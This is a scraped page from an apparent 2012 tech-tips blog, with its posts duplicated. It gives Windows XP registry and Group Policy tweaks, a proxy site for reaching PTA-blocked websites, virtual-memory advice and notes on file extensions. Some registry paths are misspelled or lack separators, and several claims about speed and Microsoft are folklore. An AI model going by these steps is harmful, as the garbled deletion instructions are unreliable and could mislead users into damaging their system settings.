sms to 9773 300 000.

Search any thing here as like GOOGLE SEARCH By GOOGLE. 

PC Tricks PC Tricks TRICKS


TRICK # 1
For those of you using Windows, do the following:
1.) Open an empty notepad file 
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want. 
4.) Close it, and re-open it.

TRICK # 2
1.) Go to Start / Run / type regedit
2.) Find HKEY_CLASSIES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA0025954E}
3.) Change the name "Recycle Bin" to whatever you want.(no special chr)
TRICK # 3
You might know this.
1.) Go to any drive.
2.) Make a folder named "con".
TRICK # 4
Even Bill Gates, couldn’t answer why this happened! 
1.) Open Microsoft Word and type
2.) =rand (200, 99)
3.) And then press ENTER.
TRICK # 5
Remove the Recycle Bin from the Desktop
1.) Go to Start / Run / type regedit
2.) HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/explorer/Desktop/NameSpace 
3.) Click on the "Recycle Bin" string in the right hand pane. Hit Del, click OK.
TRICK # 6
How to make your Desktop Icons Transparent
1.) Go to ontrol Panel > System, > Advanced >
2.) Performance area > Settings button Visual Effects tab
3.) "Use drop shadows for icon labels on the Desktop
TRICK # 7
Speed up your browsing of Windows 2000 & XP machines
1.) Go to Start / Run / type regedit
2.) Find HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace
Under that branch, select the key:
3.) {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
4.) and delete it.
TRICK # 8
IP address of your connection
1.) Go to Start / Run / type cmd
2.) then type 'ipconfig'
3.) Add the '/all' switch for more info.
TRICK # 9
How to remove the Default Picture and Fax Preview Action:
1.) Go to Start / Run / type regedit
2.) Find HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{e84fda7c-1d6a-45f6-b725-cb260c236066}/shellex
3.) Deleted the MayChangeDefaultMenu key.
TRICK # 10
How do I enable advanced security settings like found in Windows 2000
1.) Open windows explorer then click on Tools->Folder Options
2.) Click on the View Tab.
3.) (uncheck) the option that reads 'use simple file sharing'
This will allow you to see the security tab
when viewing the properties of a file
TRICK # 11
Set Processes Priority:
1.) Follow this tip to increase the priority of active processes, 
this will result in prioritisation of processes using the CPU.
2.) Press CTRL-SHIFT-ESC
3.) Go to Processes, right click on active processes, you will see the Set Priority option
4.) For example, your Run your CDwriter program, 
set the priority higher, and guess what, no crashed CD’s
TRICK # 12
Hide 'User Accounts' from users:
1.) Go to Start/Run, and type:
2.) GPEDIT.MSC
3.) Open the path
4.) User Config > Admin Templates > Control Panel
5.) doubleclick "Hide specified Control Panel applets"
6.) put a dot in 'enabled', then click 'Show"
7.) click Add button,
8.) type "nusrmgt.cpl" into the add box
TRICK # 13
Disable CD Autorun:
1.) Click Start, Run and enter GPEDIT.MSC
2.) Go to Computer Configuration, Administrative Templates, System.
3.) Locate the entry for Turn autoplay off and modify it as you desire.
TRICK # 14
Adding Programs To Stay On The Start Menu:
1.) Right click on any .exe file in Explorer, My Computer, Desktop and select 'Pin to Start Menu', the program is then displayed on the start menu, above the separator line. To remove it, click the file on the start menu and select 'Unpin from Start Menu'. Below you can check the before and after shots.
TRICK # 15
Change the text in Internet Explorers title bar:
1.) Go to Start / Run / type regedit
2.) Find HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
3.) change the value of the string "Window Title" to whatever you want on the title bar of Internet Explorer - to have no title except the title of the web pages you are browsing do not enter anything for a value.
TRICK # 16
Adjust various visual effects:
1.) Open up the control panel
2.) Go under system and click on the advanced tab
3.) Click settings under Performance options
4.) You can now change various graphical effects (mainly animations and shadows)
TRICK # 17
Remove shortcut arrow from desktop icons:
1.) Go to Start / Run / type regedit
2.) Find HKEY_CLASSES_ROOTlnkfile
3.) Delete the IsShortcut registry value.
-You may need to restart Windows XP. 

TRICK # 1
For those of you using Windows, do the following:
1.) Open an empty notepad file 
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want. 
4.) Close it, and re-open it.

TRICK # 2
1.) Go to Start / Run / type regedit
2.) Find HKEY_CLASSIES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA0025954E}
3.) Change the name "Recycle Bin" to whatever you want.(no special chr)
TRICK # 3
You might know this.
1.) Go to any drive.
2.) Make a folder named "con".
TRICK # 4
Even Bill Gates, couldn’t answer why this happened! 
1.) Open Microsoft Word and type
2.) =rand (200, 99)
3.) And then press ENTER.
TRICK # 5
Remove the Recycle Bin from the Desktop
1.) Go to Start / Run / type regedit
2.) HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/explorer/Desktop/NameSpace 
3.) Click on the "Recycle Bin" string in the right hand pane. Hit Del, click OK.
TRICK # 6
How to make your Desktop Icons Transparent
1.) Go to ontrol Panel > System, > Advanced >
2.) Performance area > Settings button Visual Effects tab
3.) "Use drop shadows for icon labels on the Desktop
TRICK # 7
Speed up your browsing of Windows 2000 & XP machines
1.) Go to Start / Run / type regedit
2.) Find HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace
Under that branch, select the key:
3.) {D6277990-4C6A-11CF-8D87-00AA0060F5BF}
4.) and delete it.
TRICK # 8
IP address of your connection
1.) Go to Start / Run / type cmd
2.) then type 'ipconfig'
3.) Add the '/all' switch for more info.
TRICK # 9
How to remove the Default Picture and Fax Preview Action:
1.) Go to Start / Run / type regedit
2.) Find HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{e84fda7c-1d6a-45f6-b725-cb260c236066}/shellex
3.) Deleted the MayChangeDefaultMenu key.
TRICK # 10
How do I enable advanced security settings like found in Windows 2000
1.) Open windows explorer then click on Tools->Folder Options
2.) Click on the View Tab.
3.) (uncheck) the option that reads 'use simple file sharing'
This will allow you to see the security tab
when viewing the properties of a file
TRICK # 11
Set Processes Priority:
1.) Follow this tip to increase the priority of active processes, 
this will result in prioritisation of processes using the CPU.
2.) Press CTRL-SHIFT-ESC
3.) Go to Processes, right click on active processes, you will see the Set Priority option
4.) For example, your Run your CDwriter program, 
set the priority higher, and guess what, no crashed CD’s
TRICK # 12
Hide 'User Accounts' from users:
1.) Go to Start/Run, and type:
2.) GPEDIT.MSC
3.) Open the path
4.) User Config > Admin Templates > Control Panel
5.) doubleclick "Hide specified Control Panel applets"
6.) put a dot in 'enabled', then click 'Show"
7.) click Add button,
8.) type "nusrmgt.cpl" into the add box
TRICK # 13
Disable CD Autorun:
1.) Click Start, Run and enter GPEDIT.MSC
2.) Go to Computer Configuration, Administrative Templates, System.
3.) Locate the entry for Turn autoplay off and modify it as you desire.
TRICK # 14
Adding Programs To Stay On The Start Menu:
1.) Right click on any .exe file in Explorer, My Computer, Desktop and select 'Pin to Start Menu', the program is then displayed on the start menu, above the separator line. To remove it, click the file on the start menu and select 'Unpin from Start Menu'. Below you can check the before and after shots.
TRICK # 15
Change the text in Internet Explorers title bar:
1.) Go to Start / Run / type regedit
2.) Find HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain
3.) change the value of the string "Window Title" to whatever you want on the title bar of Internet Explorer - to have no title except the title of the web pages you are browsing do not enter anything for a value.
TRICK # 16
Adjust various visual effects:
1.) Open up the control panel
2.) Go under system and click on the advanced tab
3.) Click settings under Performance options
4.) You can now change various graphical effects (mainly animations and shadows)
TRICK # 17
Remove shortcut arrow from desktop icons:
1.) Go to Start / Run / type regedit
2.) Find HKEY_CLASSES_ROOTlnkfile
3.) Delete the IsShortcut registry value.
-You may need to restart Windows XP. 

Sunday, 20 May 2012

Acess the PTA blocked sites



friends you can acess the PTA blocked sites visit it 

VISIT 
 http://6.hidemyass.com





and enter in the site address and enjoy.
FRIEND PLS COMMENTS. 

For more proxy sites:
please click on this button button:

                                 


friends you can acess the PTA blocked sites visit it 

VISIT 
 http://6.hidemyass.com





and enter in the site address and enjoy.
FRIEND PLS COMMENTS. 

For more proxy sites:
please click on this button button:

                                 

Saturday, 19 May 2012

: Increase Virtual RAM - To Make Your System Faster :- : Increase Virtual RAM - To Make Your System Faster :-


: Increase Virtual RAM - To Make Your System Faster :-


Follow the steps given below :- 


1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

8) Click 'Set', and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..! 

: Increase Virtual RAM - To Make Your System Faster :-


Follow the steps given below :- 


1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

8) Click 'Set', and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..! 

 shut down your computer with mobile phone

click
 shut down your computer with mobile phone

click

Sunday, 18 March 2012

Knowing Files Extension



Knowing Files Extension:



In downloads thread you can find diferent type of files (like you can find it over the web...)

.sis = Symbian installation file, just send it to your phone, and install.

.jar = Java installation, send file to your phone, and install.
Note about .jar files. You dont need to extract the .jar files into your PC, juest send them to your phone directly. By the way, if you get a.zip (or other extension) and when extract its content you get lot of files and folders, files like \META-INF\MANIFEST.MF, or *.class, it should be a .jar file... then, dont extract, just rename the main .zip to .jar. and send to your phone.

.zip = The standard compressed file, you can use winzip to extract the content... www.winzip.com

.ace = Other format of compressed file: www.winace.com

.rar = And the compressed format about everybody ask... www.rarlabs.com

Note: Its always best to extract .zip, .ace & .rar files on your PC first as your phone can only most of the time.



Knowing Files Extension:



In downloads thread you can find diferent type of files (like you can find it over the web...)

.sis = Symbian installation file, just send it to your phone, and install.

.jar = Java installation, send file to your phone, and install.
Note about .jar files. You dont need to extract the .jar files into your PC, juest send them to your phone directly. By the way, if you get a.zip (or other extension) and when extract its content you get lot of files and folders, files like \META-INF\MANIFEST.MF, or *.class, it should be a .jar file... then, dont extract, just rename the main .zip to .jar. and send to your phone.

.zip = The standard compressed file, you can use winzip to extract the content... www.winzip.com

.ace = Other format of compressed file: www.winace.com

.rar = And the compressed format about everybody ask... www.rarlabs.com

Note: Its always best to extract .zip, .ace & .rar files on your PC first as your phone can only most of the time.

 

Security Learner's Blog

This content is DMCA Protected.Copying or reproducing of procedure is prohibited.Do Not Copy!!